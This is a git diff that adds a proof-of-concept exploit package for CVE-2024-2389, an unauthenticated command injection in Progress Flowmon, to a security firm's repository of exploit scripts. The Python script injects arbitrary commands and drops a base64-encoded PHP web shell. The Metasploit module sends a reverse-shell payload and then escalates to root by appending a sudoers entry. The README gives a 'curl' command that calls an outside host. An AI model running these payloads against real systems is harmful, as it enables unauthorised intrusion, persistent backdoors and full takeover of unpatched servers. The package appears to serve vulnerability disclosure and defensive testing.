diff --git a/CVE-2024-2389/CVE-2024-2389.py b/CVE-2024-2389/CVE-2024-2389.py new file mode 100644 index 0000000..3758eb6 --- /dev/null +++ b/CVE-2024-2389/CVE-2024-2389.py @@ -0,0 +1,26 @@ +import argparse +import requests +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +parser = argparse.ArgumentParser(description='Progress Flowmon RCE') +parser.add_argument('target', type=str, help='Target URL') +parser.add_argument('--cmd', type=str, help='Blind command to run', required=False) +parser.add_argument('--web-shell', action='store_true', help='Show command output') +args = parser.parse_args() +target = args.target +cmd = args.cmd + +if args.web_shell: + print("[+] Writing webshell to /var/www/shtml/rce.php") + url = f"{target}/service.pdfs/confluence?file=userguide&lang=x&pluginPath=$(echo+PD9waHAgaWYoaXNzZXQoJF9HRVRbJ2NtZCddKSl7c3lzdGVtKCRfR0VUWydjbWQnXSk7fT8%2b+|+base64+-d+>/var/www/shtml/rce.php)" +elif args.cmd: + print("[+] Running command") + url = f"{target}/service.pdfs/confluence?file=x&lang=x&pluginPath=$({cmd})" +try: + requests.get(url, verify=False, timeout=1) # Time it out because sometimes the command will execute but the parent process hangs +except requests.exceptions.ReadTimeout or requests.exceptions.ConnectTimeout: + pass + +if args.web_shell: + print(f"[+] Visit {target}/rce.php?cmd=ls") diff --git a/CVE-2024-2389/README.md b/CVE-2024-2389/README.md new file mode 100644 index 0000000..9f3749a --- /dev/null +++ b/CVE-2024-2389/README.md @@ -0,0 +1,25 @@ +# CVE-2024-2389: Progress Software Flowmon Unauthenticated Command Injection + +## Information +**Description:** This exploits an unauthenticated command injection in the Progress Software Flowmon application. +**Versions Affected:** Tested on v12.03.02 +**Version Fixed:** 12.3.5/11.1.14 +**Researcher:** Dave Yesland (https://x.com/daveysec) +**Disclosure Link:** https://rhinosecuritylabs.com/ +**NIST CVE Link:** https://nvd.nist.gov/vuln/detail/CVE-2024-2389 +**Vendor Advisory:** https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability + +## Proof-of-Concept Exploit +### Description +This exploit a command injection flaw in an unauthenticated PDF generator endpoint affecting PdfGenerator.php. + +### Usage/Exploitation +To run a blind command: +`python3 CVE-2024-2389 --cmd 'curl a.server' TARGET` + +To write a simple webshell: +`python3 CVE-2024-2389 --web-shell TARGET` +Then visit TARGET/rce.php + +### Screenshot +![Alt-text that shows up on hover](poc_image.png) \ No newline at end of file diff --git a/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb b/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb new file mode 100644 index 0000000..851b9fe --- /dev/null +++ b/CVE-2024-2389/metasploit/progress_flowmon_unauth_cmd_injection.rb @@ -0,0 +1,120 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + prepend Msf::Exploit::Remote::AutoCheck + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Flowmon Unauthenticated Command Injection', + 'Description' => %q{ + This module exploits an unauthenticated command injection vulnerability in Progress Flowmon + versions before v12.03.02. + }, + 'Author' => [ + 'Dave Yesland with Rhino Security Labs', # Vulnerability discovery and Metasploit Module + ], + 'License' => MSF_LICENSE, + 'References' => [ + ['CVE', 'CVE-2024-2389'], + ['URL', 'https://support.kemptechnologies.com/hc/en-us/articles/24878235038733-CVE-2024-2389-Flowmon-critical-security-vulnerability'] + ], + 'DisclosureDate' => '2024', + 'Notes' => { + 'Stability' => [ CRASH_SAFE ], + 'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK], + 'Reliability' => [ REPEATABLE_SESSION ] + }, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_X86, ARCH_X64], + 'Targets' => [['Automatic', {}]], + 'Privileged' => false, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/linux/https/x64/shell/reverse_tcp', + 'SSL' => true, + 'RPORT' => 443 + }, + ) + ) + + register_options([ + OptString.new('TARGETURI', [true, 'The URI path to Flowmon', '/']), + OptBool.new('PRIVESC', [true, 'Automatically try privesc to add sudo entry', true]) + ]) + end + + def execute_command(cmd) + send_request_cgi( + 'uri' => normalize_uri(datastore['TARGETURI'], 'service.pdfs', 'confluence'), + 'method' => 'GET', + 'vars_get' => { + 'file' => 'x', + 'lang' => 'x', + 'pluginPath' => "$(#{cmd})" + } + ) + end + + def exploit + print_status('Attempting to execute payload...') + execute_command(payload.encoded) + end + + def on_new_session(session) + if datastore['PRIVESC'] + execute_privesc_command(session) + else + print_status('Privilege escalation skipped.') + end + end + + def execute_privesc_command(session) + print_status("Executing privilege escalation command...") + session.shell_command('cp /var/www/shtml/index.php /tmp/index.php.bak;') + session.shell_command('echo \'> /etc/sudoers"); ?>\' > /var/www/shtml/index.php;') + session.shell_command('sudo /usr/bin/php /var/www/shtml/index.php Cli\\:AddNewSource s;') + session.shell_command('cp /tmp/index.php.bak /var/www/shtml/index.php;') + print_status('You should be able to use "sudo -i" for a root shell...') + end + + def check + print_status("Checking if #{peer} can be exploited!") + + uri = normalize_uri(target_uri.path, 'homepage/auth/login') + res = send_request_cgi( + 'uri' => uri, + 'method' => 'GET' + ) + + unless res + print_error("Connection failed") + return CheckCode::Unknown + end + + # Use a regular expression to extract the version number from the response + version = res.body.match(/\/favicon\.ico\?v=([\d.]+)/) + + unless version && version[1] + print_error("Unable to determine the version from the favicon link.") + return CheckCode::Unknown + end + + print_status("Detected version: #{version[1]}") + + if Rex::Version.new(version[1]) <= Rex::Version.new('12.03.02') + print_good("Version #{version[1]} is vulnerable.") + return CheckCode::Vulnerable + else + print_error("Version #{version[1]} is not vulnerable.") + return CheckCode::Safe + end + end + end \ No newline at end of file diff --git a/CVE-2024-2389/poc_image.png b/CVE-2024-2389/poc_image.png new file mode 100644 index 0000000..4a17b1e --- /dev/null +++ b/CVE-2024-2389/poc_image.png @@ -0,0 +1 @@ +This should be an image showing the successful exploit \ No newline at end of file diff --git a/README.md b/README.md index a8e1f46..297fbbd 100644 --- a/README.md +++ b/README.md @@ -2,6 +2,7 @@ A collection of proof-of-concept exploit scripts written by the team at Rhino Security Labs for various CVEs. * [CVE-2024-2449: Cross-Site Requets Forgery in Progress Kemp LoadMaster](CVE-2024-2449/) * [CVE-2024-2448: Authenticated Command Injection in Progress Kemp LoadMaster](CVE-2024-2448/) +* [CVE-2024-2389: Progress Software Flowmon Unauthenticated Command Injection](CVE-2024-2389/) * [CVE-2024-23724: Ghost CMS Stored XSS Leading to Owner Takeover](CVE-2024-23724/) * [CVE-2024-1212: Unauthenticated Command Injection in Progress Kemp LoadMaster](CVE-2024-1212/) * [CVE-2023-47327: Silverpeas Core Space Create Function is vulnerable to Broken Access Control](CVE-2023-47327/)